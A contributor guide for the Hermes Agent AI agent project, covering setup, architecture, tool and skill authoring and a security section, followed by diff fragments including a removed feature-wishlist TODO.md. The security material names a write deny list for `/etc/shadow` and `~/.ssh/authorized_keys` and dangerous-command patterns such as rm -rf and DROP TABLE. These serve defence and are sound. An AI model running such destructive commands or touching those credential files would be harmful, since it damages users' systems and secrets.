Thank you for contributing to Hermes Agent! This guide covers everything you need: setting up your dev environment, understanding the architecture, deciding what to build, and getting your PR merged.
---
## Contribution Priorities
We value contributions in this order:
1. **Bug fixes** — crashes, incorrect behavior, data loss. Always top priority.
2. **Cross-platform compatibility** — Windows, macOS, different Linux distros, different terminal emulators. We want Hermes to work everywhere.
3. **Security hardening** — shell injection, prompt injection, path traversal, privilege escalation. See [Security](#security-considerations).
4. **Performance and robustness** — retry logic, error handling, graceful degradation.
5. **New skills** — but only broadly useful ones. See [Should it be a Skill or a Tool?](#should-it-be-a-skill-or-a-tool)
6. **New tools** — rarely needed. Most capabilities should be skills. See below.
7. **Documentation** — fixes, clarifications, new examples.
---
## Should it be a Skill or a Tool?
This is the most common question for new contributors. The answer is almost always **skill**.
### Make it a Skill when:
- The capability can be expressed as instructions + shell commands + existing tools
- It wraps an external CLI or API that the agent can call via `terminal` or `web_extract`
- It doesn't need custom Python integration or API key management baked into the agent
- Examples: arXiv search, git workflows, Docker management, PDF processing, email via CLI tools
### Make it a Tool when:
- It requires end-to-end integration with API keys, auth flows, or multi-component configuration managed by the agent harness
- It needs custom processing logic that must execute precisely every time (not "best effort" from LLM interpretation)
- It handles binary data, streaming, or real-time events that can't go through the terminal
- Examples: browser automation (Browserbase session management), TTS (audio encoding + platform delivery), vision analysis (base64 image handling)
### Should the Skill be bundled?
Bundled skills (in `skills/`) ship with every Hermes install. They should be **broadly useful to most users**:
- Document handling, web research, common dev workflows, system administration
- Used regularly by a wide range of people
If your skill is official and useful but not universally needed (e.g., a paid service integration, a heavyweight dependency), put it in **`optional-skills/`** — it ships with the repo but isn't activated by default. Users can discover it via `hermes skills browse` (labeled "official") and install it with `hermes skills install` (no third-party warning, builtin trust).
If your skill is specialized, community-contributed, or niche, it's better suited for a **Skills Hub** — upload it to a skills registry and share it in the [Nous Research Discord](https://discord.gg/NousResearch). Users can install it with `hermes skills install`.
---
## Development Setup
### Prerequisites
| Requirement | Notes |
|-------------|-------|
| **Git** | With `--recurse-submodules` support |
| **Python 3.11+** | uv will install it if missing |
| **uv** | Fast Python package manager ([install](https://docs.astral.sh/uv/)) |
| **Node.js 18+** | Optional — needed for browser tools and WhatsApp bridge |
### Clone and install
```bash
git clone --recurse-submodules https://github.com/NousResearch/hermes-agent.git
cd hermes-agent
# Create venv with Python 3.11
uv venv venv --python 3.11
export VIRTUAL_ENV="$(pwd)/venv"
# Install with all extras (messaging, cron, CLI menus, dev tools)
uv pip install -e ".[all,dev]"
uv pip install -e "./mini-swe-agent"
uv pip install -e "./tinker-atropos"
# Optional: browser tools
npm install
```
### Configure for development
```bash
mkdir -p ~/.hermes/{cron,sessions,logs,memories,skills}
cp cli-config.yaml.example ~/.hermes/config.yaml
touch ~/.hermes/.env
# Add at minimum an LLM provider key:
echo 'OPENROUTER_API_KEY=sk-or-v1-your-key' >> ~/.hermes/.env
```
### Run
```bash
# Symlink for global access
mkdir -p ~/.local/bin
ln -sf "$(pwd)/venv/bin/hermes" ~/.local/bin/hermes
# Verify
hermes doctor
hermes chat -q "Hello"
```
### Run tests
```bash
pytest tests/ -v
```
---
## Project Structure
```
hermes-agent/
├── run_agent.py # AIAgent class — core conversation loop, tool dispatch, session persistence
├── cli.py # HermesCLI class — interactive TUI, prompt_toolkit integration
├── model_tools.py # Tool orchestration (thin layer over tools/registry.py)
├── toolsets.py # Tool groupings and presets (hermes-cli, hermes-telegram, etc.)
├── hermes_state.py # SQLite session database with FTS5 full-text search, session titles
├── batch_runner.py # Parallel batch processing for trajectory generation
├── agent/ # Agent internals (extracted modules)
│ ├── prompt_builder.py # System prompt assembly (identity, skills, context files, memory)
│ ├── context_compressor.py # Auto-summarization when approaching context limits
│ ├── auxiliary_client.py # Resolves auxiliary OpenAI clients (summarization, vision)
│ ├── display.py # KawaiiSpinner, tool progress formatting
│ ├── model_metadata.py # Model context lengths, token estimation
│ └── trajectory.py # Trajectory saving helpers
├── hermes_cli/ # CLI command implementations
│ ├── main.py # Entry point, argument parsing, command dispatch
│ ├── config.py # Config management, migration, env var definitions
│ ├── setup.py # Interactive setup wizard
│ ├── auth.py # Provider resolution, OAuth, Nous Portal
│ ├── models.py # OpenRouter model selection lists
│ ├── banner.py # Welcome banner, ASCII art
│ ├── commands.py # Slash command definitions + autocomplete
│ ├── callbacks.py # Interactive callbacks (clarify, sudo, approval)
│ ├── doctor.py # Diagnostics
│ └── skills_hub.py # Skills Hub CLI + /skills slash command
├── tools/ # Tool implementations (self-registering)
│ ├── registry.py # Central tool registry (schemas, handlers, dispatch)
│ ├── approval.py # Dangerous command detection + per-session approval
│ ├── terminal_tool.py # Terminal orchestration (sudo, env lifecycle, backends)
│ ├── file_operations.py # read_file, write_file, search, patch, etc.
│ ├── web_tools.py # web_search, web_extract (Firecrawl + Gemini summarization)
│ ├── vision_tools.py # Image analysis via multimodal models
│ ├── delegate_tool.py # Subagent spawning and parallel task execution
│ ├── code_execution_tool.py # Sandboxed Python with RPC tool access
│ ├── session_search_tool.py # Search past conversations with FTS5 + summarization
│ ├── cronjob_tools.py # Scheduled task management
│ ├── skill_tools.py # Skill search, load, manage
│ └── environments/ # Terminal execution backends
│ ├── base.py # BaseEnvironment ABC
│ ├── local.py, docker.py, ssh.py, singularity.py, modal.py, daytona.py
├── gateway/ # Messaging gateway
│ ├── run.py # GatewayRunner — platform lifecycle, message routing, cron
│ ├── config.py # Platform configuration resolution
│ ├── session.py # Session store, context prompts, reset policies
│ └── platforms/ # Platform adapters
│ ├── telegram.py, discord_adapter.py, slack.py, whatsapp.py
├── scripts/ # Installer and bridge scripts
│ ├── install.sh # Linux/macOS installer
│ ├── install.ps1 # Windows PowerShell installer
│ └── whatsapp-bridge/ # Node.js WhatsApp bridge (Baileys)
├── skills/ # Bundled skills (copied to ~/.hermes/skills/ on install)
├── optional-skills/ # Official optional skills (discoverable via hub, not activated by default)
├── environments/ # RL training environments (Atropos integration)
├── tests/ # Test suite
├── website/ # Documentation site (hermes-agent.nousresearch.com)
├── cli-config.yaml.example # Example configuration (copied to ~/.hermes/config.yaml)
└── AGENTS.md # Development guide for AI coding assistants
```
### User configuration (stored in `~/.hermes/`)
| Path | Purpose |
|------|---------|
| `~/.hermes/config.yaml` | Settings (model, terminal, toolsets, compression, etc.) |
| `~/.hermes/.env` | API keys and secrets |
| `~/.hermes/auth.json` | OAuth credentials (Nous Portal) |
| `~/.hermes/skills/` | All active skills (bundled + hub-installed + agent-created) |
| `~/.hermes/memories/` | Persistent memory (MEMORY.md, USER.md) |
| `~/.hermes/state.db` | SQLite session database |
| `~/.hermes/sessions/` | JSON session logs |
| `~/.hermes/cron/` | Scheduled job data |
| `~/.hermes/whatsapp/session/` | WhatsApp bridge credentials |
---
## Architecture Overview
### Core Loop
```
User message → AIAgent._run_agent_loop()
├── Build system prompt (prompt_builder.py)
├── Build API kwargs (model, messages, tools, reasoning config)
├── Call LLM (OpenAI-compatible API)
├── If tool_calls in response:
│ ├── Execute each tool via registry dispatch
│ ├── Add tool results to conversation
│ └── Loop back to LLM call
├── If text response:
│ ├── Persist session to DB
│ └── Return final_response
└── Context compression if approaching token limit
```
### Key Design Patterns
- **Self-registering tools**: Each tool file calls `registry.register()` at import time. `model_tools.py` triggers discovery by importing all tool modules.
- **Toolset grouping**: Tools are grouped into toolsets (`web`, `terminal`, `file`, `browser`, etc.) that can be enabled/disabled per platform.
- **Session persistence**: All conversations are stored in SQLite (`hermes_state.py`) with full-text search and unique session titles. JSON logs go to `~/.hermes/sessions/`.
- **Ephemeral injection**: System prompts and prefill messages are injected at API call time, never persisted to the database or logs.
- **Provider abstraction**: The agent works with any OpenAI-compatible API. Provider resolution happens at init time (Nous Portal OAuth, OpenRouter API key, or custom endpoint).
- **Provider routing**: When using OpenRouter, `provider_routing` in config.yaml controls provider selection (sort by throughput/latency/price, allow/ignore specific providers, data retention policies). These are injected as `extra_body.provider` in API requests.
---
## Code Style
- **PEP 8** with practical exceptions (we don't enforce strict line length)
- **Comments**: Only when explaining non-obvious intent, trade-offs, or API quirks. Don't narrate what the code does — `# increment counter` adds nothing
- **Error handling**: Catch specific exceptions. Log with `logger.warning()`/`logger.error()` — use `exc_info=True` for unexpected errors so stack traces appear in logs
- **Cross-platform**: Never assume Unix. See [Cross-Platform Compatibility](#cross-platform-compatibility)
---
## Adding a New Tool
Before writing a tool, ask: [should this be a skill instead?](#should-it-be-a-skill-or-a-tool)
Tools self-register with the central registry. Each tool file co-locates its schema, handler, and registration:
```python
"""my_tool — Brief description of what this tool does."""
import json
from tools.registry import registry
def my_tool(param1: str, param2: int = 10, **kwargs) -> str:
"""Handler. Returns a string result (often JSON)."""
result = do_work(param1, param2)
return json.dumps(result)
MY_TOOL_SCHEMA = {
"type": "function",
"function": {
"name": "my_tool",
"description": "What this tool does and when the agent should use it.",
"parameters": {
"type": "object",
"properties": {
"param1": {"type": "string", "description": "What param1 is"},
"param2": {"type": "integer", "description": "What param2 is", "default": 10},
},
"required": ["param1"],
},
},
}
def _check_requirements() -> bool:
"""Return True if this tool's dependencies are available."""
return True
registry.register(
name="my_tool",
toolset="my_toolset",
schema=MY_TOOL_SCHEMA,
handler=lambda args, **kw: my_tool(**args, **kw),
check_fn=_check_requirements,
)
```
Then add the import to `model_tools.py` in the `_modules` list:
```python
_modules = [
# ... existing modules ...
"tools.my_tool",
]
```
If it's a new toolset, add it to `toolsets.py` and to the relevant platform presets.
---
## Adding a Skill
Bundled skills live in `skills/` organized by category. Official optional skills use the same structure in `optional-skills/`:
```
skills/
├── research/
│ └── arxiv/
│ ├── SKILL.md # Required: main instructions
│ └── scripts/ # Optional: helper scripts
│ └── search_arxiv.py
├── productivity/
│ └── ocr-and-documents/
│ ├── SKILL.md
│ ├── scripts/
│ └── references/
└── ...
```
### SKILL.md format
```markdown
---
name: my-skill
description: Brief description (shown in skill search results)
version: 1.0.0
author: Your Name
license: MIT
platforms: [macos, linux] # Optional — restrict to specific OS platforms
# Valid: macos, linux, windows
# Omit to load on all platforms (default)
metadata:
hermes:
tags: [Category, Subcategory, Keywords]
related_skills: [other-skill-name]
---
# Skill Title
Brief intro.
## When to Use
Trigger conditions — when should the agent load this skill?
## Quick Reference
Table of common commands or API calls.
## Procedure
Step-by-step instructions the agent follows.
## Pitfalls
Known failure modes and how to handle them.
## Verification
How the agent confirms it worked.
```
### Platform-specific skills
Skills can declare which OS platforms they support via the `platforms` frontmatter field. Skills with this field are automatically hidden from the system prompt, `skills_list()`, and slash commands on incompatible platforms.
```yaml
platforms: [macos] # macOS only (e.g., iMessage, Apple Reminders)
platforms: [macos, linux] # macOS and Linux
platforms: [windows] # Windows only
```
If the field is omitted or empty, the skill loads on all platforms (backward compatible). See `skills/apple/` for examples of macOS-only skills.
### Skill guidelines
- **No external dependencies unless absolutely necessary.** Prefer stdlib Python, curl, and existing Hermes tools (`web_extract`, `terminal`, `read_file`).
- **Progressive disclosure.** Put the most common workflow first. Edge cases and advanced usage go at the bottom.
- **Include helper scripts** for XML/JSON parsing or complex logic — don't expect the LLM to write parsers inline every time.
- **Test it.** Run `hermes --toolsets skills -q "Use the X skill to do Y"` and verify the agent follows the instructions correctly.
---
## Cross-Platform Compatibility
Hermes runs on Linux, macOS, and Windows. When writing code that touches the OS:
### Critical rules
1. **`termios` and `fcntl` are Unix-only.** Always catch both `ImportError` and `NotImplementedError`:
```python
try:
from simple_term_menu import TerminalMenu
menu = TerminalMenu(options)
idx = menu.show()
except (ImportError, NotImplementedError):
# Fallback: numbered menu for Windows
for i, opt in enumerate(options):
print(f" {i+1}. {opt}")
idx = int(input("Choice: ")) - 1
```
2. **File encoding.** Windows may save `.env` files in `cp1252`. Always handle encoding errors:
```python
try:
load_dotenv(env_path)
except UnicodeDecodeError:
load_dotenv(env_path, encoding="latin-1")
```
3. **Process management.** `os.setsid()`, `os.killpg()`, and signal handling differ on Windows. Use platform checks:
```python
import platform
if platform.system() != "Windows":
kwargs["preexec_fn"] = os.setsid
```
4. **Path separators.** Use `pathlib.Path` instead of string concatenation with `/`.
5. **Shell commands in installers.** If you change `scripts/install.sh`, check if the equivalent change is needed in `scripts/install.ps1`.
---
## Security Considerations
Hermes has terminal access. Security matters.
### Existing protections
| Layer | Implementation |
|-------|---------------|
| **Sudo password piping** | Uses `shlex.quote()` to prevent shell injection |
| **Dangerous command detection** | Regex patterns in `tools/approval.py` with user approval flow |
| **Cron prompt injection** | Scanner in `tools/cronjob_tools.py` blocks instruction-override patterns |
| **Write deny list** | Protected paths (`~/.ssh/authorized_keys`, `/etc/shadow`) resolved via `os.path.realpath()` to prevent symlink bypass |
| **Skills guard** | Security scanner for hub-installed skills (`tools/skills_guard.py`) |
| **Code execution sandbox** | `execute_code` child process runs with API keys stripped from environment |
| **Container hardening** | Docker: all capabilities dropped, no privilege escalation, PID limits, size-limited tmpfs |
### When contributing security-sensitive code
- **Always use `shlex.quote()`** when interpolating user input into shell commands
- **Resolve symlinks** with `os.path.realpath()` before path-based access control checks
- **Don't log secrets.** API keys, tokens, and passwords should never appear in log output
- **Catch broad exceptions** around tool execution so a single failure doesn't crash the agent loop
- **Test on all platforms** if your change touches file paths, process management, or shell commands
If your PR affects security, note it explicitly in the description.
---
## Pull Request Process
### Branch naming
```
fix/description # Bug fixes
feat/description # New features
docs/description # Documentation
test/description # Tests
refactor/description # Code restructuring
```
### Before submitting
1. **Run tests**: `pytest tests/ -v`
2. **Test manually**: Run `hermes` and exercise the code path you changed
3. **Check cross-platform impact**: If you touch file I/O, process management, or terminal handling, consider Windows and macOS
4. **Keep PRs focused**: One logical change per PR. Don't mix a bug fix with a refactor with a new feature.
### PR description
Include:
- **What** changed and **why**
- **How to test** it (reproduction steps for bugs, usage examples for features)
- **What platforms** you tested on
- Reference any related issues
### Commit messages
We use [Conventional Commits](https://www.conventionalcommits.org/):
```
<type>(<scope>): <description>
```
| Type | Use for |
|------|---------|
| `fix` | Bug fixes |
| `feat` | New features |
| `docs` | Documentation |
| `test` | Tests |
| `refactor` | Code restructuring (no behavior change) |
| `chore` | Build, CI, dependency updates |
Scopes: `cli`, `gateway`, `tools`, `skills`, `agent`, `install`, `whatsapp`, `security`, etc.
Examples:
```
fix(cli): prevent crash in save_config_value when model is a string
feat(gateway): add WhatsApp multi-user session isolation
fix(security): prevent shell injection in sudo password piping
test(tools): add unit tests for file_operations
```
---
## Reporting Issues
- Use [GitHub Issues](https://github.com/NousResearch/hermes-agent/issues)
- Include: OS, Python version, Hermes version (`hermes version`), full error traceback
- Include steps to reproduce
- Check existing issues before creating duplicates
- For security vulnerabilities, please report privately
---
## Community
- **Discord**: [discord.gg/NousResearch](https://discord.gg/NousResearch) — for questions, showcasing projects, and sharing skills
- **GitHub Discussions**: For design proposals and architecture discussions
- **Skills Hub**: Upload specialized skills to a registry and share them with the community
---
## License
By contributing, you agree that your contributions will be licensed under the [MIT License](LICENSE).

21
LICENSE Normal file
View File

@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2025 Nous Research
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

1213
README.md

File diff suppressed because it is too large Load Diff

589
TODO.md
View File

@@ -1,589 +0,0 @@
# Hermes Agent - Future Improvements
> Ideas for enhancing the agent's capabilities, generated from self-analysis of the codebase.
---
## 1. Subagent Architecture (Context Isolation) 🎯
**Problem:** Long-running tools (terminal commands, browser automation, complex file operations) consume massive context. A single `ls -la` can add hundreds of lines. Browser snapshots, debugging sessions, and iterative terminal work quickly bloat the main conversation, leaving less room for actual reasoning.
**Solution:** The main agent becomes an **orchestrator** that delegates context-heavy tasks to **subagents**.
**Architecture:**
```
┌─────────────────────────────────────────────────────────────────┐
│ ORCHESTRATOR (main agent) │
│ - Receives user request │
│ - Plans approach │
│ - Delegates heavy tasks to subagents │
│ - Receives summarized results │
│ - Maintains clean, focused context │
└─────────────────────────────────────────────────────────────────┘
│ │ │
▼ ▼ ▼
┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐
│ TERMINAL AGENT │ │ BROWSER AGENT │ │ CODE AGENT │
│ - terminal tool │ │ - browser tools │ │ - file tools │
│ - file tools │ │ - web_search │ │ - terminal │
│ │ │ - web_extract │ │ │
│ Isolated context│ │ Isolated context│ │ Isolated context│
│ Returns summary │ │ Returns summary │ │ Returns summary │
└─────────────────┘ └─────────────────┘ └─────────────────┘
```
**How it works:**
1. User asks: "Set up a new Python project with FastAPI and tests"
2. Orchestrator plans: "I need to create files, install deps, write code"
3. Orchestrator calls: `terminal_task(goal="Create venv, install fastapi pytest", context="New project in ~/myapp")`
4. **Subagent spawns** with fresh context, only terminal/file tools
5. Subagent iterates (may take 10+ tool calls, lots of output)
6. Subagent completes → returns summary: "Created venv, installed fastapi==0.109.0, pytest==8.0.0"
7. Orchestrator receives **only the summary**, context stays clean
8. Orchestrator continues with next subtask
**Key tools to implement:**
- [ ] `terminal_task(goal, context, cwd?)` - Delegate terminal/shell work
- [ ] `browser_task(goal, context, start_url?)` - Delegate web research/automation
- [ ] `code_task(goal, context, files?)` - Delegate code writing/modification
- [ ] Generic `delegate_task(goal, context, toolsets=[])` - Flexible delegation
**Implementation details:**
- [ ] Subagent uses same `run_agent.py` but with:
- Fresh/empty conversation history
- Limited toolset (only what's needed)
- Smaller max_iterations (focused task)
- Task-specific system prompt
- [ ] Subagent returns structured result:
```python
{
"success": True,
"summary": "Installed 3 packages, created 2 files",
"details": "Optional longer explanation if needed",
"artifacts": ["~/myapp/requirements.txt", "~/myapp/main.py"], # Files created
"errors": [] # Any issues encountered
}
```
- [ ] Orchestrator sees only the summary in its context
- [ ] Full subagent transcript saved separately for debugging
**Benefits:**
- 🧹 **Clean context** - Orchestrator stays focused, doesn't drown in tool output
- 📊 **Better token efficiency** - 50 terminal outputs → 1 summary paragraph
- 🎯 **Focused subagents** - Each agent has just the tools it needs
- 🔄 **Parallel potential** - Independent subtasks could run concurrently
- 🐛 **Easier debugging** - Each subtask has its own isolated transcript
**When to use subagents vs direct tools:**
- **Subagent**: Multi-step tasks, iteration likely, lots of output expected
- **Direct**: Quick one-off commands, simple file reads, user needs to see output
**Files to modify:** `run_agent.py` (add orchestration mode), new `tools/delegate_tools.py`, new `subagent_runner.py`
---
## 2. Planning & Task Management 📋
**Problem:** Agent handles tasks reactively without explicit planning. Complex multi-step tasks lack structure, progress tracking, and the ability to decompose work into manageable chunks.
**Ideas:**
- [ ] **Task decomposition tool** - Break complex requests into subtasks:
```
User: "Set up a new Python project with FastAPI, tests, and Docker"
Agent creates plan:
├── 1. Create project structure and requirements.txt
├── 2. Implement FastAPI app skeleton
├── 3. Add pytest configuration and initial tests
├── 4. Create Dockerfile and docker-compose.yml
└── 5. Verify everything works together
```
- Each subtask becomes a trackable unit
- Agent can report progress: "Completed 3/5 tasks"
- [ ] **Progress checkpoints** - Periodic self-assessment:
- After N tool calls or time elapsed, pause to evaluate
- "What have I accomplished? What remains? Am I on track?"
- Detect if stuck in loops or making no progress
- Could trigger replanning if approach isn't working
- [ ] **Explicit plan storage** - Persist plan in conversation:
- Store as structured data (not just in context)
- Update status as tasks complete
- User can ask "What's the plan?" or "What's left?"
- Survives context compression (plans are protected)
- [ ] **Failure recovery with replanning** - When things go wrong:
- Record what failed and why
- Revise plan to work around the issue
- "Step 3 failed because X, adjusting approach to Y"
- Prevents repeating failed strategies
**Files to modify:** `run_agent.py` (add planning hooks), new `tools/planning_tool.py`
---
## 3. Dynamic Skills Expansion 📚
**Problem:** Skills system is elegant but static. Skills must be manually created and added.
**Ideas:**
- [ ] **Skill acquisition from successful tasks** - After completing a complex task:
- "This approach worked well. Save as a skill?"
- Extract: goal, steps taken, tools used, key decisions
- Generate SKILL.md automatically
- Store in user's skills directory
- [ ] **Skill templates** - Common patterns that can be parameterized:
```markdown
# Debug {language} Error
1. Reproduce the error
2. Search for error message: `web_search("{error_message} {language}")`
3. Check common causes: {common_causes}
4. Apply fix and verify
```
- [ ] **Skill chaining** - Combine skills for complex workflows:
- Skills can reference other skills as dependencies
- "To do X, first apply skill Y, then skill Z"
- Directed graph of skill dependencies
**Files to modify:** `tools/skills_tool.py`, `skills/` directory structure, new `skill_generator.py`
---
## 4. Interactive Clarifying Questions Tool ❓
**Problem:** Agent sometimes makes assumptions or guesses when it should ask the user. Currently can only ask via text, which gets lost in long outputs.
**Ideas:**
- [ ] **Multiple-choice prompt tool** - Let agent present structured choices to user:
```
ask_user_choice(
question="Should the language switcher enable only German or all languages?",
choices=[
"Only enable German - works immediately",
"Enable all, mark untranslated - show fallback notice",
"Let me specify something else"
]
)
```
- Renders as interactive terminal UI with arrow key / Tab navigation
- User selects option, result returned to agent
- Up to 4 choices + optional free-text option
- [ ] **Implementation:**
- Use `inquirer` or `questionary` Python library for rich terminal prompts
- Tool returns selected option text (or user's custom input)
- **CLI-only** - only works when running via `cli.py` (not API/programmatic use)
- Graceful fallback: if not in interactive mode, return error asking agent to rephrase as text
- [ ] **Use cases:**
- Clarify ambiguous requirements before starting work
- Confirm destructive operations with clear options
- Let user choose between implementation approaches
- Checkpoint complex multi-step workflows
**Files to modify:** New `tools/ask_user_tool.py`, `cli.py` (detect interactive mode), `model_tools.py`
---
## 5. Collaborative Problem Solving 🤝
**Problem:** Interaction is command/response. Complex problems benefit from dialogue.
**Ideas:**
- [ ] **Assumption surfacing** - Make implicit assumptions explicit:
- "I'm assuming you want Python 3.11+. Correct?"
- "This solution assumes you have sudo access..."
- Let user correct before going down wrong path
- [ ] **Checkpoint & confirm** - For high-stakes operations:
- "About to delete 47 files. Here's the list - proceed?"
- "This will modify your database. Want a backup first?"
- Configurable threshold for when to ask
**Files to modify:** `run_agent.py`, system prompt configuration
---
## 6. Project-Local Context 💾
**Problem:** Valuable context lost between sessions.
**Ideas:**
- [ ] **Project awareness** - Remember project-specific context:
- Store `.hermes/context.md` in project directory
- "This is a Django project using PostgreSQL"
- Coding style preferences, deployment setup, etc.
- Load automatically when working in that directory
- [ ] **Handoff notes** - Leave notes for future sessions:
- Write to `.hermes/notes.md` in project
- "TODO for next session: finish implementing X"
- "Known issues: Y doesn't work on Windows"
**Files to modify:** New `project_context.py`, auto-load in `run_agent.py`
## 6. Tools & Skills Wishlist 🧰
*Things that would need new tool implementations (can't do well with current tools):*
### High-Impact
- [ ] **Audio/Video Transcription** 🎬 *(See also: Section 16 for detailed spec)*
- Transcribe audio files, podcasts, YouTube videos
- Extract key moments from video
- Voice memo transcription for messaging integrations
- *Provider options: Whisper API, Deepgram, local Whisper*
- [ ] **Diagram Rendering** 📊
- Render Mermaid/PlantUML to actual images
- Can generate the code, but rendering requires external service or tool
- "Show me how these components connect" → actual visual diagram
### Medium-Impact
- [ ] **Canvas / Visual Workspace** 🖼️
- Agent-controlled visual panel for rendering interactive UI
- Inspired by OpenClaw's Canvas feature
- **Capabilities:**
- `present` / `hide` - Show/hide the canvas panel
- `navigate` - Load HTML files or URLs into the canvas
- `eval` - Execute JavaScript in the canvas context
- `snapshot` - Capture the rendered UI as an image
- **Use cases:**
- Display generated HTML/CSS/JS previews
- Show interactive data visualizations (charts, graphs)
- Render diagrams (Mermaid → rendered output)
- Present structured information in rich format
- A2UI-style component system for structured agent UI
- **Implementation options:**
- Electron-based panel for CLI
- WebSocket-connected web app
- VS Code webview extension
- *Would let agent "show" things rather than just describe them*
- [ ] **Document Generation** 📄
- Create styled PDFs, Word docs, presentations
- *Can do basic PDF via terminal tools, but limited*
- [ ] **Diff/Patch Tool** 📝
- Surgical code modifications with preview
- "Change line 45-50 to X" without rewriting whole file
- Show diffs before applying
- *Can use `diff`/`patch` but a native tool would be safer*
### Skills to Create
- [ ] **Domain-specific skill packs:**
- DevOps/Infrastructure (Terraform, K8s, AWS)
- Data Science workflows (EDA, model training)
- Security/pentesting procedures
- [ ] **Framework-specific skills:**
- React/Vue/Angular patterns
- Django/Rails/Express conventions
- Database optimization playbooks
- [ ] **Troubleshooting flowcharts:**
- "Docker container won't start" → decision tree
- "Production is slow" → systematic diagnosis
---
## 7. Messaging Platform Integrations 💬 ✅ COMPLETE
**Problem:** Agent currently only works via `cli.py` which requires direct terminal access. Users may want to interact via messaging apps from their phone or other devices.
**Architecture:**
- `run_agent.py` already accepts `conversation_history` parameter and returns updated messages ✅
- Need: persistent session storage, platform monitors, session key resolution
**Implementation approach:**
```
┌─────────────────────────────────────────────────────────────┐
│ Platform Monitor (e.g., telegram_monitor.py) │
│ ├─ Long-running daemon connecting to messaging platform │
│ ├─ On message: resolve session key → load history from disk│
│ ├─ Call run_agent.py with loaded history │
│ ├─ Save updated history back to disk (JSONL) │
│ └─ Send response back to platform │
└─────────────────────────────────────────────────────────────┘
```
**Platform support (each user sets up their own credentials):**
- [x] **Telegram** - via `python-telegram-bot`
- Bot token from @BotFather
- Easiest to set up, good for personal use
- [x] **Discord** - via `discord.py`
- Bot token from Discord Developer Portal
- Can work in servers (group sessions) or DMs
- [x] **WhatsApp** - via Node.js bridge (whatsapp-web.js/baileys)
- Requires Node.js bridge setup
- More complex, but reaches most people
**Session management:**
- [x] **Session store** - JSONL persistence per session key
- `~/.hermes/sessions/{session_id}.jsonl`
- Session keys: `agent:main:telegram:dm`, `agent:main:discord:group:123`, etc.
- [x] **Session expiry** - Configurable reset policies
- Daily reset (default 4am) OR idle timeout (default 2 hours)
- Manual reset via `/reset` or `/new` command in chat
- Per-platform and per-type overrides
- [x] **Session continuity** - Conversations persist across messages until reset
**Files created:** `gateway/`, `gateway/platforms/`, `gateway/config.py`, `gateway/session.py`, `gateway/delivery.py`, `gateway/run.py`
**Configuration:**
- Environment variables: `TELEGRAM_BOT_TOKEN`, `DISCORD_BOT_TOKEN`, etc.
- Config file: `~/.hermes/gateway.json`
- CLI commands: `/platforms` to check status, `--gateway` to start
**Dynamic context injection:**
- Agent knows its source platform and chat
- Agent knows connected platforms and home channels
- Agent can deliver cron outputs to specific platforms
---
## 8. Text-to-Speech (TTS) 🔊
**Problem:** Agent can only respond with text. Some users prefer audio responses (accessibility, hands-free use, podcasts).
**Ideas:**
- [ ] **TTS tool** - Generate audio files from text
```python
tts_generate(text="Here's your summary...", voice="nova", output="summary.mp3")
```
- Returns path to generated audio file
- For messaging integrations: can send as voice message
- [ ] **Provider options:**
- Edge TTS (free, good quality, many voices)
- OpenAI TTS (paid, excellent quality)
- ElevenLabs (paid, best quality, voice cloning)
- Local options (Coqui TTS, Bark)
- [ ] **Modes:**
- On-demand: User explicitly asks "read this to me"
- Auto-TTS: Configurable to always generate audio for responses
- Long-text handling: Summarize or chunk very long responses
- [ ] **Integration with messaging:**
- When enabled, can send voice notes instead of/alongside text
- User preference per channel
**Files to create:** `tools/tts_tool.py`, config in `cli-config.yaml`
---
## 13. Speech-to-Text / Audio Transcription 🎤
**Problem:** Users may want to send voice memos instead of typing. Agent is blind to audio content.
**Ideas:**
- [ ] **Voice memo transcription** - For messaging integrations
- User sends voice message → transcribe → process as text
- Seamless: user speaks, agent responds
- [ ] **Audio/video file transcription** - Existing idea, expanded:
- Transcribe local audio files (mp3, wav, m4a)
- Transcribe YouTube videos (download audio → transcribe)
- Extract key moments with timestamps
- [ ] **Provider options:**
- OpenAI Whisper API (good quality, cheap)
- Deepgram (fast, good for real-time)
- Local Whisper (free, runs on GPU)
- Groq Whisper (fast, free tier available)
- [ ] **Tool interface:**
```python
transcribe(source="audio.mp3") # Local file
transcribe(source="https://youtube.com/...") # YouTube
transcribe(source="voice_message", data=bytes) # Voice memo
```
**Files to create:** `tools/transcribe_tool.py`, integrate with messaging monitors
### Plugin/Extension System 🔌
**Concept:** Allow users to add custom tools/skills without modifying core code.
**Why interesting:**
- Community contributions
- Organization-specific tools
- Clean separation of core vs. extensions
**Open questions:**
- Security implications of loading arbitrary code
- Versioning and compatibility
- Discovery and installation UX
---
## Recently Completed ✅
### Dangerous Command Approval System
**Implemented:** Dangerous command detection and approval for terminal tool.
**Features:**
- Pattern-based detection of dangerous commands (rm -rf, DROP TABLE, chmod 777, etc.)
- CLI prompt with options: `[o]nce | [s]ession | [a]lways | [d]eny`
- Session caching (approved patterns don't re-prompt)
- Permanent allowlist in `~/.hermes/config.yaml`
- Force flag for agent to bypass after user confirmation
- Skip check for isolated backends (Docker, Singularity, Modal)
- Helpful sudo failure messages for messaging platforms
**Files:** `tools/terminal_tool.py`, `model_tools.py`, `hermes_cli/config.py`
---
## 14. Learning Machine / Dynamic Memory System 🧠
*Inspired by [Dash](~/agent-codebases/dash) - a self-learning data agent.*
**Problem:** Agent starts fresh every session. Valuable learnings from debugging, error patterns, successful approaches, and user preferences are lost.
**Dash's Key Insight:** Separate **Knowledge** (static, curated) from **Learnings** (dynamic, discovered):
| System | What It Stores | How It Evolves |
|--------|---------------|----------------|
| **Knowledge** (Skills) | Validated approaches, templates, best practices | Curated by user |
